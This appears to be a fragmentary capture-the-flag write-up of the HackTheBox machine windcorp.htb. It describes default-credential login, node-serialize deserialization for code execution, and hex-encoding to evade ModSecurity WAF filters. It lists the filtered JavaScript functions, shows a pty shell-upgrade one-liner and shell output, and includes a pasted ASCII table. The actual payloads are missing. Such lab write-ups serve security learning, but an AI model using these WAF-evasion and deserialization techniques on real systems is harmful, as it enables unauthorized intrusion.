Redirects to windcorp.htb so I had to add it into /etc/hosts.
From source code we know that its using MyBiz - v4.7.0 from bootstrap.
Nothing crazy here.
I tried admin'||'1'=='1 as this is running on nodejs, but it says wrong credentials.
But admin:admin works on this page.
On burp, I went to see the login process. First it makes a POST request to submit the credentials, and then it sends another GET request with a new header profile. Which is basically base64 encoded credentials in JSON format.
This post explains how to abuse JS deserialization to get code execution.
TLDR
Untrusted data passed into unserialize() function in node-serialize module can be exploited to achieve arbitrary code execution by passing a serialized JavaScript Object with an Immediately invoked function expression (IIFE).
The post explains the attack , and also how to get a reverse shell from it.
First lets create the payload:
This is what it'll look like
But we hit Modsecurity which is a WAF. It says Action Blocked.
Turns out modesecurity will filter this part of the payload and not allow it
After modifying this we still get Action Blocked. Turns out other function here are also filtered such as ones found here in core rules.
So I modified some more. A useful manual for converting ASCII to Hex was the man page for ASCII.
I chose a few characters in the payload and replaced them with Hex characters. And the final reverse shell payload was:
And we will get a shell on the listening port.
We can a shell on the Linux VM as the user webster.
# Some generic snippets used:
# - function() {
# - new Function(
# - eval(
# - String.fromCharCode(
ascii(7) Miscellaneous Information Manual ascii(7)
NAME
ascii - ASCII character set encoded in octal, decimal, and hexadecimal
DESCRIPTION
ASCII is the American Standard Code for Information Interchange. It is a 7-bit code. Many 8-bit codes (e.g., ISO/IEC 8859-1) contain ASCII as their lower half. The international
counterpart of ASCII is known as ISO/IEC 646-IRV.
The following table contains the 128 ASCII characters.
C program '\X' escapes are noted.
Oct Dec Hex Char Oct Dec Hex Char
────────────────────────────────────────────────────────────────────────
000 0 00 NUL '\0' (null character) 100 64 40 @
001 1 01 SOH (start of heading) 101 65 41 A
002 2 02 STX (start of text) 102 66 42 B
003 3 03 ETX (end of text) 103 67 43 C
004 4 04 EOT (end of transmission) 104 68 44 D
005 5 05 ENQ (enquiry) 105 69 45 E
006 6 06 ACK (acknowledge) 106 70 46 F
007 7 07 BEL '\a' (bell) 107 71 47 G
010 8 08 BS '\b' (backspace) 110 72 48 H
011 9 09 HT '\t' (horizontal tab) 111 73 49 I
012 10 0A LF '\n' (new line) 112 74 4A J
013 11 0B VT '\v' (vertical tab) 113 75 4B K
014 12 0C FF '\f' (form feed) 114 76 4C L
015 13 0D CR '\r' (carriage ret) 115 77 4D M
016 14 0E SO (shift out) 116 78 4E N
017 15 0F SI (shift in) 117 79 4F O
020 16 10 DLE (data link escape) 120 80 50 P
021 17 11 DC1 (device control 1) 121 81 51 Q
022 18 12 DC2 (device control 2) 122 82 52 R
023 19 13 DC3 (device control 3) 123 83 53 S
024 20 14 DC4 (device control 4) 124 84 54 T
025 21 15 NAK (negative ack.) 125 85 55 U
026 22 16 SYN (synchronous idle) 126 86 56 V
027 23 17 ETB (end of trans. blk) 127 87 57 W
030 24 18 CAN (cancel) 130 88 58 X
031 25 19 EM (end of medium) 131 89 59 Y
032 26 1A SUB (substitute) 132 90 5A Z
033 27 1B ESC (escape) 133 91 5B [
python3 -c 'import pty; pty.spawn("/bin/bash")'
webster@webserver:/$ ls
ls
bin home lib32 media root sys vmlinuz
boot initrd.img lib64 mnt run tmp vmlinuz.old
dev initrd.img.old libx32 opt sbin usr
etc lib lost+found proc srv var
